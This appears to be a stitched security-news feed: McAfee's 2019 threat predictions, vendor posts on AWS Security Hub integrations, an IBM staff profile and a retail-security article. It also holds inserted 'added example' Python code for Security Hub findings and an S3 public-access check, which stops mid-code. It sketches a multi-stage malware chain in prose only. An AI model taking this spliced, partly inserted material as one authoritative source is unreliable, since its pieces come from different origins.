Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.
Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.
Synergistic Threats Will Multiply, Requiring Combined Responses
This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaceted, or synergistic, threats.
What could be worse?
Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.
One of the reasons synergic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.
An example is worth a thousand words
Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.
The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.
This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.
Be curious, be creative, connect your defenses
Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?
Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.
Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands
The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries’ tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.
Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.
In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.
Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.
Data Exfiltration Attacks to Target the Cloud
In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.
With the increased adoption of Office 365, we have noticed a surge of attacks on the service—especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.
Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.
McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:
- Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
- Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
- Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.
Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices
As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.
But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.
For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.
(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).
This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.
Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.
Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.
Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.
Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”
Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege
Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.
Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.
Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.
At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.
Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices.
Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)
McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.
Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.
Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.
IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.
Amazon Web Services on Wednesday announced the launch of AWS Security Hub, a service designed to aggregate and prioritize alerts from AWS and third-party security tools.
This article explains how Imperva application security integrates with AWS Security Hub to give customers better visibility and feedback on the security status of their AWS hosted applications.
Securing AWS Applications
Cost reduction, simplified operations, and other benefits are driving organizations to move more and more applications onto AWS delivery platforms, because all of the infrastructure maintenance is taken care of by AWS. As with any migration to a cloud service, however, it’s important to remember that cloud vendors generally implement their services under a Shared Security Responsibility Model. AWS explains this in a whitepaper available here.
Imperva solutions help diverse enterprise organizations maintain consistent protection across all applications in their IT domain (including AWS) by combining multiple defenses against network-layer (Layer 3-4) and application-layer (Layer 7) Distributed Denial of Service (DDoS) attacks, OWASP top 10 application security risks, and even zero-day attacks. Imperva application security is a top-rated solution by both Gartner and Forrester for both WAF and DDoS protection.
Visibility Leads to Better Outcomes
WAF security is further enhanced through Imperva Attack Analytics, which uses machine learning technology to correlate millions of security events across Imperva WAF assets and group them into a small number of prioritized incidents, making security teams more effective by giving them clear and actionable insights.
AWS Security Hub is a new web service that provides a consolidated security view across AWS services as well as third-party solutions. Imperva has integrated its Attack Analytics platform with AWS Security Hub so that the security incidents Attack Analytics generates can be presented in the Security Hub console.
Brief Description of How the Integration Works
The integration works by utilizing an interface developed for AWS Security Hub for what is essentially an “external data connector” called a Findings Provider (FP). The FP enables AWS Security Hub to ingest standardized information from Attack Analytics so that the information can be parsed, sorted and displayed. This FP is freely available to Imperva and AWS customers on Imperva’s GitHub page listed at the end of this article.
Data flows between Attack Analytics and AWS Security Hub as follows: Attack Analytics exports the security incidents into an AWS S3 bucket within the customer’s account, from which the Imperva FP picks them up for upload.
To activate AWS Security Hub to use the Imperva FP, customers must configure several things described in the AWS Security Hub documentation. As part of the activation process, the FP running in the customer’s environment needs to acquire a product-import token from AWS Security Hub. Upon FP activation, the FP is authorized to import findings into their AWS Security Hub account in the AFF format, which will happen at configurable time intervals.
It’s critically important that organizations maintain robust application security controls as they build or migrate applications to AWS architectures. Imperva helps organizations ensure every application instance can be protected against both known and zero-day threats, and through integration with AWS Security Hub, Imperva Attack Analytics can ensure organizations always have the most current and most accurate status of their enterprise application security posture.
Security Hub is initially being made available as a public preview. We are currently looking for existing Attack Analytics customers that are interested in working with us to refine our integration. If you’re interested in working with us on this, please get in touch. Once Security Hub becomes generally available, we intend to release our Security Hub integration as an open source project on Imperva’s GitHub account.
The post Imperva Integration With AWS Security Hub: Expanding Customer Security Visibility appeared first on Blog.
One of the biggest challenges in maintaining your security posture is visibility. You have security controls deployed throughout the stack, and each of these tools is generating its own set of data points and has its own view of your deployment.
Managing the multitude of alerts and events from these tools can quickly get overwhelming. Enter AWS Security Hub.
Announced at AWS re:Invent 2018, this service is available to all AWS users as a public preview. Trend Micro is proud to be a supporting launch partner by allowing customers to send high-value findings from Deep Security to this exciting new service.
What is AWS Security Hub?
AWS Security Hub provides a comprehensive view of your high priority security alerts and compliance status for your AWS deployment. By combining data from Amazon GuardDuty, Amazon Inspector, and Amazon Macie along with a host of APN partner solutions, the AWS Security Hub is a one-stop shop for security visibility.
Each data source provides various findings relevant to the tool. Amazon Macie will send findings related to data within Amazon S3 buckets it monitors, Amazon GuardDuty will provide findings based on the assessments it runs on your Amazon EC2 Instances, and so forth.
This not only helps you gain visibility and respond to incidents but also helps you monitor ongoing compliance requirements with automated checks against the Center for Internet Security (CIS) AWS Foundations Benchmark.
AWS Security Hub not only brings together this information across your AWS accounts but it prioritizes these findings to help you spot trends, identify potential issues, and take the relevant steps to protect your AWS deployments.
You can read more about AWS Security Hub on the AWS blog.
Instance Security Data
Trend Micro’s Deep Security offers a host of security controls to protect your Amazon EC2 instances and Amazon ECS hosts, helping you to fulfill your responsibilities under the shared responsibility model.
By providing technical controls like intrusion prevention, anti-malware, application control, and others, Deep Security lets you roll out one security tool to address all of your security and compliance requirements.
Read more about the specifics of Deep Security deployed in AWS on the Trend Micro AWS microsite.
As it sits protecting the instance, Deep Security generates a lot of useful security information for compliance, incident response, and forensics. With the integration with AWS Security Hub, high priority information generated by Deep Security will be sent to the service in order to centralize and simplify the view of your deployment’s security across multiple AWS services and APN solutions.
This complements the suite of existing AWS security services and the existing Deep Security integrations with AWS WAF, Amazon GuardDuty, Amazon Macie, and Amazon Inspector, helping to bring together all of your critical AWS security data in one simple-to-use service.
The Deep Security integration with the AWS Security Hub is available today on GitHub. This simple integration runs as an AWS Lambda function in your account, sending high priority security events to the new service.
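A minimal version of the export-and-import step that both the Imperva Findings Provider description above and this Deep Security Lambda describe, as an added example that is not either vendor's code: it filters constructed incident records by severity, converts each into a finding in the AWS Security Finding Format (ASFF) that Security Hub ingests, and splits the result into batches of at most 100 for the BatchImportFindings call. The incident field names and the generator name are hypothetical; the product ARN is the account's default custom product rather than a registered partner product.

```python
"""Build AWS Security Finding Format (ASFF) findings from a product's exported incidents.

Added example, not Imperva's Findings Provider or Trend Micro's Lambda. The incident
records are constructed and their field names hypothetical. The ASFF details used
(SchemaVersion "2018-10-08", Severity.Normalized 0-100, required top-level fields,
100 findings per BatchImportFindings call) are as documented by AWS.
"""
import hashlib
import json

ASFF_SCHEMA_VERSION = "2018-10-08"
BATCH_LIMIT = 100  # BatchImportFindings accepts at most 100 findings per call

# Required top-level ASFF fields; a finding missing any of these is rejected on import.
REQUIRED_FIELDS = (
    "SchemaVersion", "Id", "ProductArn", "GeneratorId", "AwsAccountId", "Types",
    "CreatedAt", "UpdatedAt", "Severity", "Title", "Description", "Resources",
)

# Product severity label -> ASFF Severity.Normalized (0-100).
SEVERITY_NORMALIZED = {"informational": 0, "low": 20, "medium": 50, "high": 70, "critical": 90}

# Constructed sample of what an exporter might drop into the customer's S3 bucket.
SAMPLE_INCIDENTS = [
    {"id": "inc-1001", "severity": "critical", "type": "SQL Injection",
     "site": "shop.example.com", "events": 4312,
     "first_seen": "2018-12-03T10:15:00Z", "last_seen": "2018-12-03T11:02:00Z"},
    {"id": "inc-1002", "severity": "low", "type": "Bot Scan",
     "site": "shop.example.com", "events": 12,
     "first_seen": "2018-12-03T10:20:00Z", "last_seen": "2018-12-03T10:21:00Z"},
    {"id": "inc-1003", "severity": "high", "type": "Remote Code Execution",
     "site": "api.example.com", "events": 87,
     "first_seen": "2018-12-03T12:00:00Z", "last_seen": "2018-12-03T12:40:00Z"},
]


def product_arn(region, account_id):
    """ARN of the account's default custom product (no partner registration needed)."""
    return f"arn:aws:securityhub:{region}:{account_id}:product/{account_id}/default"


def finding_id(arn, incident_id):
    """Stable Id: Security Hub keys findings on (Id, ProductArn), so re-importing the
    same incident on the next interval updates the finding instead of duplicating it."""
    return hashlib.sha256(f"{arn}|{incident_id}".encode()).hexdigest()


def to_asff(incident, account_id, region):
    """Map one constructed incident record to a single ASFF finding."""
    level = incident["severity"].lower()
    if level not in SEVERITY_NORMALIZED:
        raise ValueError(f"unknown product severity {incident['severity']!r}")
    arn = product_arn(region, account_id)
    return {
        "SchemaVersion": ASFF_SCHEMA_VERSION,
        "Id": finding_id(arn, incident["id"]),
        "ProductArn": arn,
        "GeneratorId": "waf-incident-exporter",  # hypothetical generator name
        "AwsAccountId": account_id,
        "Types": ["TTPs/Initial Access"],
        "CreatedAt": incident["first_seen"],
        "UpdatedAt": incident["last_seen"],
        "Severity": {"Product": float(SEVERITY_NORMALIZED[level]),
                     "Normalized": SEVERITY_NORMALIZED[level]},
        "Title": f"{incident['type']} against {incident['site']}",
        "Description": (f"{incident['events']} correlated {incident['type']} events "
                        f"against {incident['site']} (product incident {incident['id']})"),
        "Resources": [{"Type": "Other", "Id": incident["site"], "Region": region}],
        "RecordState": "ACTIVE",
    }


def validate(finding):
    """Return the required ASFF fields that are missing or empty (empty list = valid)."""
    return [f for f in REQUIRED_FIELDS if not finding.get(f)]


def select_high_priority(incidents, minimum="high"):
    """Keep only incidents at or above the given product severity."""
    threshold = SEVERITY_NORMALIZED[minimum]
    return [i for i in incidents if SEVERITY_NORMALIZED[i["severity"].lower()] >= threshold]


def batches(findings, size=BATCH_LIMIT):
    """Split findings into lists no larger than the BatchImportFindings limit."""
    return [findings[i:i + size] for i in range(0, len(findings), size)]


def build_import_batches(incidents, account_id, region, minimum="high"):
    """Filter, convert and validate incidents; returns batches ready for import."""
    findings = [to_asff(i, account_id, region) for i in select_high_priority(incidents, minimum)]
    bad = [f["Id"] for f in findings if validate(f)]
    if bad:
        raise ValueError(f"findings missing required fields: {bad}")
    return batches(findings)


if __name__ == "__main__":
    for batch in build_import_batches(SAMPLE_INCIDENTS, "123456789012", "us-east-1"):
        # With AWS credentials and boto3 installed, the import call would be:
        # boto3.client("securityhub").batch_import_findings(Findings=batch)
        print(json.dumps(batch, indent=2))
```

Run on its own it prints the one batch the sample produces (the low-severity bot scan is filtered out); the commented boto3 call is where a scheduled run would hand the batch to Security Hub.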
Get started today in just a few minutes with a few easy steps!
The post AWS Security Hub and Deep Security appeared first on .
For years, cybersecurity professionals across the globe have been highly alarmed by threats appearing in the form of malware, including Trojans, viruses, worms, and spear phishing attacks. And this year was no different. 2018 witnessed its fair share of attacks, including some new trends: credential theft emerged as a major concern, and although ransomware remains […]
The post Evolving Cyberthreats: It’s Time to Enhance Your IT Security Mechanisms appeared first on Radware Blog.
Threat prevention provider Cylance this week announced support for Amazon Web Services (AWS) in its CylancePROTECT threat prevention solution.
Microsoft has provided information on the root cause of the massive outage that last week impacted its Azure Active Directory authentication services across Europe, Asia, and the Americas.
Orkus on Monday emerged from stealth mode with a cloud security platform designed to help organizations secure access to data, apps and infrastructure.
How businesses are building firewalls is changing. We’re seeing a continued trend toward smaller firewall boundaries and micro-segmentation to support zero-trust strategies, although it can be very piecemeal. As businesses
The post Managing Firewalls in the Cloud: do Companies Know Enough About Security Intent? appeared first on The Cyber Security Place.
There’s rarely a time in the day when Andi Hudson isn’t immersed in technology. When he’s not fulfilling his duties as IBM’s cloud security architecture lead in the U.K., he’s reaching out to the next generation of cyber professionals through volunteer work with universities and colleges. Or, he’s teaching his own young kids how to write in Python, or how to make wacky contraptions, such as an automated irrigation kit and a Tesla coil that plays music.
Simply put, Andi Hudson lives and breathes tech and security, and he’s always happy to chat about anything from cloud security, to artificial intelligence (AI), to the impact of the Internet of Things (IoT) to the neuroscience of privacy denial.
“For me, cybersecurity has to start right at the very beginning,” he said, speaking from his home in South Wales. “Giving kids access to this stuff is important, but even more important is teaching them to use it ethically and responsibly.”
Spreading the Gospel of Data Privacy
No matter what else he’s doing, Andi is always keeping a close eye on the future. He’s particularly interested in artificial intelligence, data privacy and what the C-suite needs to pay more attention to.
Much of it comes down to the data, which Andi classified as “the oil of tomorrow.” He believes that, given the right bits of information, cybercriminals can steal data (including identities) and “really go to town with this information.” He’s also worried about the confirmation bias this level of sharing brings — that our “likes” are collected and we’re grouped with other users who share the same ideas and opinions. To quote Andi, quoting author Cory Doctorow: “It’s not about what you have to hide; it’s about what you choose to share.”
“We give away so much information so freely, to a degree I think the horse has already bolted,” he said. “That’s why I invest so much of my own time in educating academia, because they’re the next generation. But it doesn’t just start at universities and colleges; it starts at home in the family, and in primary school and secondary school. Security is not a product — it’s a process.”
Andi is a science, technology, engineering and mathematics (STEM) ambassador, as well as a Barefoot volunteer with Computing at School (CAS). He visits primary schools to nurture the next generation of cyber professionals. Andi shows the faculty how to teach computational science, helps children understand the importance of STEM subjects and exposes them to careers in technology.
A Nontraditional Approach to Cloud Security
When he’s not nurturing the youth, Andi leads a growing team of architects at IBM Security U.K. Part of his role is to ensure that all the individual skill sets in security keep cloud-based applications front of mind. IBM promoted him to lead after catching wind of the impressive work he did in the London insurance market, building collaborative cross-vendor solutions for a new target operating model that enables 9,000 U.K. financial services companies to work together.
“IBM never really had a cloud team that encompassed a lot of those different skill sets,” he said. “A lot of the traditional architecture always sat in resource pools within somebody else’s data center — but, of course, with the cloud, that’s all different now. They’re not using their own data centers anymore; they’re using ours.”
While Andi primarily works hands-on with clients on cloud-related transformation projects, he also gets to speak at conferences and, of course, engage with the education sector in both his day job and his volunteer work.
A member of the South Wales Cyber Security Cluster, Andi works with Cardiff’s three universities to make courses as relevant as possible according to the latest industry trends. That plays into the work IBM does with Exeter University, and may soon start doing with Warwick University and the University of the West of England.
“It’s about making a difference,” he said before launching into a story from last year when, at the height of the Petya and WannaCry ransomware outbreaks, he found himself in a war room on a weekend trying to reverse-engineer a client out of an attack.
“You know when you feel sick in your stomach, the nerves and anxiety? I’ve had it before when I used to work for a services company; we switched the system off once and it didn’t come back on,” he recalled. “You have this gut-sickness feeling. You’ve just done a lot of work, you’ve had no sleep, and you know you won’t get any sleep or food until this problem’s gone. It was exactly like that — that sick feeling.”
Why Security Leaders Need to Tell It Like It Is
Luckily, Andi was so close to the customer and had been so hands-on with the account that he was able to solve the problem and develop a watertight remediation plan. He even won an award for his work.
The key, he said, is his willingness to have frank discussions about security, even if it means telling clients what they don’t want to hear. Andi has found that this nontraditional approach helps him develop closer relationships with clients and break conversational barriers that would otherwise stymie progress.
“I think that clear, open transparency just resonates with customers,” he emphasized. “A lot of things were always taboo — certain things you didn’t say to certain executives, and certain things you didn’t cover — but if you want a real, secure solution, unfortunately you have to have those conversations.”
This transparency is especially crucial today, given the lightning-quick pace of change in the industry and ever-evolving nature of the cyberthreat landscape.
“The fact is, it keeps changing — and what’s right today might not be right tomorrow.”
That’s why Andi always has his eyes on tomorrow — both in terms of the threats his clients will have to contend with and the next generation of cybersecurity heroes that will defend them.
The post How Cloud Security Architect Andi Hudson Nurtures Today’s Youth to Protect Tomorrow’s Data appeared first on Security Intelligence.
Cybersecurity is still the big one. But interoperability and telehealth are not far behind for leading organizations’ technology goals. The Center for Connected Medicine polled IT executives across 38 health
The post Center for Connected Medicine Polls Top Health Systems About 2019 Priorities appeared first on The Cyber Security Place.
Digital transformation is dominating retailers’ attention — and their IT budgets. As a result, significant gaps in retail cybersecurity are left unfilled just as retail IT faces new challenges, from infrastructure moving to the cloud without clear security policies to an array of new threat vectors focused on personal customer information, ransomware and underprotected business-to-business (B2B) connections.
Just as with line-of-business functions like merchandising and operations, retailers’ cybersecurity functions must undergo a digital transformation to become more holistic, proactive and nimble when protecting their businesses, partners and customers.
Retailers Aren’t Prioritizing Security, and Attackers Are Exploiting the Gaps
According to the retail edition of the “2018 Thales Data Threat Report,” 75 percent of retailers have experienced at least one data breach in the past, with half seeing a breach in the past year alone. That puts retail among the most-attacked industries as ranked by the “2018 IBM X-Force Threat Intelligence Index.”
Underfunded security infrastructure is likely a big reason for this trend; organizations only dedicated an average of around 5 percent of their overall IT budgets to security and risk management, according to a 2016 Gartner report.
While retailers have done a great job addressing payment card industry (PCI) compliance, it has come at a cost to other areas. According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, 78 percent of publicly disclosed point-of-sale (POS) malware breaches in 2017 occurred in the retail sector.
In addition to traditional POS attacks, malicious actors are targeting retailers with new threat vectors that deliver more bang for the buck, such as the following:
- Personally identifiable information (PII) about customers — Harvested through retailers’ B2C portals, this data is used, often at scale via bot networks, to create false identities and make fraudulent transactions. An increasingly popular approach involves making purchases with gift cards acquired through fraud.
- Ransomware — Criminals exploit poorly configured apps and susceptible end users to access and lock up data, then extract pricey ransoms from targeted retailers.
- Unprotected B2B vendor connections — Threat actors can gain access to retail systems by way of digital connections to partners. A growing target is retailers’ B2B portals that have been built without sufficient security standards.
What Are the Biggest Flaws in Retail Cybersecurity?
These new types of attacks take advantage of retailers’ persistent underfunding of critical security defenses. Common gaps include inadequate vulnerability scanning capabilities, unsegmented and poorly designed networks, and using custom apps on legacy systems without compensating controls. When retailers do experience a breach, they tend to address the specific cause instead of taking a more holistic look at their environments.
Retailers also struggle to attract security talent, competing with financial services and other deeper-pocketed employers. The National Institute of Standards and Technology (NIST) reported in 2017 that the global cybersecurity workforce shortage is expected to reach 1.5 million by 2019.
In addition, flaws in governance make retailers more vulnerable to these new types of security threats. To keep up with rapidly evolving consumer demands, many line-of-business departments are adopting cloud and software-as-a-service (SaaS) solutions — but they often do so without any standardized security guidance from IT.
According to the “2017 Thales Data Threat Report,” the majority of U.S. retail organizations planned to use sensitive data in an advanced technology environment such as cloud, big data, Internet of Things (IoT) or containers this year. More than half believed that sensitive data use was happening at the time in these environments without proper security in place. Furthermore, companies undergoing cloud migration at the time of a breach incur $12 per record in additional costs, according to the “2018 Cost of a Data Breach Study.”
To protect their data, retailers need tools to both identify security threats and escalate the response back through their entire infrastructure, including SaaS and cloud services. But many enterprises lack that response capability. What’s more, the “Cost of a Data Breach Study” found that using an incident response (IR) team can reduce the cost of a breach by around $14 per compromised record.
Unfortunately, cybersecurity is not always on the radar in retailers’ C-suites. Without a regularly updated cybersecurity scorecard that reflects an organization’s current vulnerability to attack, senior executives might not regularly discuss the topic, take part in system testing or see cybersecurity as part of business continuity.
3 Steps to Close the Gaps in Your Security Stance
Time isn’t stopping as retailers grapple with these threats. Retail cybersecurity leaders must also monitor the General Data Protection Regulation (GDPR), where compliance requirements are sometimes poorly understood, as well as the emergence of artificial intelligence (AI) in both spoofing and security response. In addition, retailers should keep an eye on the continued uncertainty about the vulnerability of platform-as-a-service (PaaS), microservices, cloud-native apps and other emerging technologies.
By addressing the gaps in their infrastructure, governance and staffing, retailers can more effectively navigate known threats and those that will inevitably emerge. Change is never easy, but the following three steps can help retailers initiate digital transformation and evolve their current approach to better suit today’s conditions:
1. Increase Budgets
According to Thales, 84 percent of U.S. retailers plan to increase their security spending. While allocating these additional funds, it’s important for retailers to take a more holistic view, matching budgets to areas of the highest need. Understanding the costs and benefits of addressing security gaps internally or through outsourcing is a key part of this analysis.
2. Improve Governance
Enacting consistent security guidelines across internally run systems as well as cloud- and SaaS-based services can help retailers ensure that they do not inadvertently open up new vulnerabilities in their platforms. Senior-level endorsement is an important ingredient in prioritizing cybersecurity across the enterprise. Regular security scorecarding can be a valuable tool to keep cybersecurity at the top of executives’ minds.
3. Invest in MSS
A growing number of retailers have realized that starting or increasing their use of managed security services (MSS) can help them achieve a higher level of security maturity at the same price as managing activities in-house, if not at a lower cost. MSS allow retailers’ internal cybersecurity to operate more efficiently, address critical talent shortages and enable retailers to close critical gaps in their current security stance.
Why Digital Transformation Is Critical to Rapid Response
Digital transformation is all about becoming more proactive and nimble to respond to consumers’ rapidly growing expectations for seamless, frictionless shopping. Retailers’ cybersecurity efforts require a similar, large-scale transition to cope with new threat vectors, close significant infrastructure gaps and extend security protocols across new platforms, such as cloud and SaaS. By rethinking their budgets, boosting governance and incorporating MSS into their security operations, retail security professionals can support digital transformation while ensuring the business and customer data remains protected and secure.
Hardly a week goes by that we don’t hear about an organization leaving sensitive data exposed on the Internet because it failed to properly configure its Amazon S3 buckets. Amazon Web Services, to its credit, is trying to prevent this from happening. For one, all newly created S3 buckets and objects (files and directories in the bucket) are private by default, i.e. not publicly accessible to random people via the Internet. Secondly, changes implemented earlier … More
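As an added example (not AWS code, and the post above does not name the feature; the identification of it as S3 Block Public Access, released in November 2018, is mine), the check below flags the two things that turn a private-by-default bucket into a public one: ACL grants to the AllUsers or AuthenticatedUsers groups, and bucket-policy Allow statements with a wildcard Principal and no Condition. It also shows the PutPublicAccessBlock configuration that shuts both paths off. The sample ACL and policy are constructed; the boto3 client is optional so the logic runs offline.

```python
"""Flag the S3 settings that make a bucket public, and apply the block.

Added example, not AWS code. Checks the two conditions S3 Block Public
Access is designed to stop (public-group ACL grants and wildcard-principal
Allow statements in the bucket policy); sample ACL and policy are constructed.
"""
import json

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
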